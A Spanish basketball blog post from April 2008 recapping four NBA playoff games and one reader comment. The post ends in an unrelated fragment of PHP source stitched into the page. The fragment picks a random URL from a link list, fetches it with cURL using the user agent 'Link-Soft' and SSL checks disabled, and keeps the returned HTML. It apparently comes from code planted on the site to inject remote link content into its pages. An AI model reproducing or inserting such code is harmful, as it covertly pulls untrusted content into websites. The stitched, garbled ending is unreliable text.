Billups manda, Detroit manda

30 de April de 2008 por txusma

by TheDeerHunter, Txusma & Xapa

Billups manda, Detroit manda (PHI 81 – DET 91)

Estos Pistons son perros viejos, de eso no hay duda, y son competitivos independientemente de las condiciones en las que se encuentren. Billups ha dado muestras de no estar bien en esta eliminatoria. André Miller y sus chavales de Philadelphia han logrado controlarle y han tratado por todos los medios de descabezar a los Pistons, con todo lo que eso significaría para ellos. En sus dos victorias dejaron a Billups en pobres porcentajes de tiro y un bajos guarismos de puntos y asistencias, bajo sospecha, como siempre en este equipo, de llegar fundido al tramo decisivo. Pero en un momento clave como el de ayer salió a muerte a por el partido desde el primer segundo y lideró a su equipo en un parcial de 35 – 21 que los Sixers iban a ser incapaces de remontar. No contento con eso, también apretó los dientes en defensa, devolviéndole a Miller la jugada y por extensión a Philadelhpia que sin el excelente base pierde muchísimo contra un equipo tan bien cohesionado como Detroit.

Ayer los Pistons sumaron todos, tanto en ataque como en defenda. Por contra en Philadelphia, sólo Iguadala aguantó el chaparrón y también el escolta Louis Williams, que está cuajando unos sensacionales playoffs. Dalembert, por su parte, apareció con el cráneo rapado a lo mohicano. Como Sansón, perdió la fuerza junto a su cabello.

Las palabras de Tomjanovich (UTA 69 – HOU 95)

“No subestimes el corazón de un campeón”. Esta frase, instalada en la cabeza de T-Mac y sus compañeros, empieza a resonar también en las cabezas de los jugadores de Utah, que ven que lo que parecía a priori una eliminatoria sencilla contra un equipo cansado y castigadísimo por las lesiones, se está convirtiendo en todo un ejercicio de supervivencia por parte de los Rockets. McGrady nunca ha luchado tanto contra su leyenda negra en Playoffs y aunque las apuestas siguen en su contra, hay que reconocerle la lucha y la entrega que está demostrando.

Ayer contó además con la ayuda de todo el equipo. Alston resulta mucho más fundamental de lo que se podría creer en un principio, Mutombo y Landry son el perfecto complemento de experiencia y juventud aportando intensidad y entrega en cada rebote, a Scola le han faltado 2 meses para entrar de pleno en la lucha por el título de rookie del año, Battier ha sido y es uno de los mejores defensores de la liga, pero por encima de todo son un equipo, comandados por un Rick Adelman que ha hecho un trabajo excelente. Ayer los Jazz no fueron rival pero el partido realmente trascendente será el que se juegue el próximo viernes en el EnergySolutions Arena de Utah, en el que T-Mac volverá a luchar contra su leyenda con la palabras que aprendió de Tomjanovich.

Engordar para morir (DAL 94 – NOH 99)

Dicen que nunca es tarde si la dicha es buena. Algunos partíamos de la premisa que Dallas tiene una plantilla larga y de mucha calidad y que a un intercambio de golpes tiene más recursos que New Orleans. En la medida que sus jugadores lograran hacerlo bien superaban sin problemas a una plantilla de Hornets limitada en algunos puntos.

Nada más lejos de la realidad. Anoche todas nuestras creencias cayeron por su propio peso aunque no se puede poner demasiadas pegas al partido que hizo anoche Dallas. Hasta 7 jugadores alcanzaron dobles figuras con un alto nivel general en todos los aspectos del juego: Buenos porcentajes, bien en la distribución de balón, en los rebotes… La dicha fue buena, pero sucedió tarde.

De todas formas, aún habiendo logrado hacer un partido muy meritorio, no fue suficiente. Los Hornets nos demostraron a todos que ahora mismo es un equipo superior y que cuenta con un jugador en estado de gracia superior a casi todos. Chris Paul decidió anoche que la eliminatoria había terminado: Triple doble, partido escandaloso y a otra cosa, mariposa…

Se repite la historia (PHO 87 – SA 92)

Los Spurs despacharon a los Suns en el quinto partido de la serie de la primera ronda en lo que parece haberse convertido ya en todo un ritual en la NBA ya que es la cuarta vez en seis años que esto sucede. Con esta victoria San Antonio puede finaquitar un ciclo de una máquina del baloncesto ofensivo que ha enamorado a todos de la mano de su entrenador Mike D´Antoni. Su rival en semifinales de conferencia serán los flamantes New Orleans Hornets que de la mano del aspirante a MVP de la liga, Chris Paul, derrotaron en 5 partidos a los Dallas Mavericks.

Ayer en las espuelas destacaron Tim Duncan con 29 puntos y 17 rebotes y el base Tony Parker con 31 y 8 asistencias. Al francés se le ve muy enchufado en esta serie ya que hqa sobrepasado los 30 puntos en 3 partidos de la eliminatoria cuando durante toda la liga regular tan solo lo consiguió en 4 ocasiones. El mejor sexto hombre de la liga, Manu Ginobili, parece que jugó algo lesionado y se quedó en unos tristes 8 puntos (2 de 11) aunque metió 3 tiros libres fundamentales al final del partido. De los Suns el mejor fue Diaw que rozó el triple doble con 22 puntos, 8 rebotes y 8 asistencias, seguido de Amare Stoudamire con 15 puntos y 11 rebotes. Nash, por su parte, realizó un partido para olvidar, uno de los peores que se le recuerdan, fallando 12 tiros y repartiendo tan solo 3 asistencias. Y todos sabemos que son los Suns sin Nash.

Gregg Popovic es uno de los principales culpables del éxito de estos Spurs. A parte de tener la suerte del campeón, como el primer partido con la doble prórroga, sabe donde pegar, y sabe aprovechar los pequeños defectos del rival. Ayer volvió a poner en práctica el Hack a Shaq (esta vez 9 de 20, 20 de 37 en toda la eliminatoria) e intentó innovar con un Hack a Skinner al final del primer cuarto. El pívot, que tiene un porcentaje rondando al 56% en tiros libres, anotó 3 de los 4 lanzamientos que intentó y Popovic se puso a buscar otra llaga donde hurgar.

Comenta

Un comentario a esta entrada

  1. Dantley dice:
    #1

    Lo de Paul como dices es escandaloso. Qué jugador en una posición a la que parecía que le faltaban estrellas tras Nash y tras haberse acabado Kidd.

    No he visto lo de Billups, pero estaba mal, Miller le estaba haciendo un traje. A ese nivel, en la siguiente ronda si llegan (creo que sí) van a tener problemas. Sonará raro, pero para mí que una de las claves cuando ganan es Afflalo, en defensa me resulta muy bueno y en ataque irá mejorando, de momento le basta con no hacer tonterías.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>